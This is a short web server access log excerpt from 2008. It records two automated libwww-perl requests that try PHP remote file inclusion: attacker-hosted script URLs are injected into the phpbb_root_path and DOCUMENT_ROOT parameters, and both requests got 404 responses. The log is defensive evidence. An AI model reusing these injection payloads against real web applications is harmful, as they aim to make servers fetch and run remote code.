216.246.52.41 - - [04/Nov/2008:08:21:35 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://vobucks.com/spam/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.68.51.126 - - [04/Nov/2008:08:21:43 -0800] "GET /logs/access_080908.log%20//index.php?DOCUMENT_ROOT=http://www.noertershausen.de/event/id_osyris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
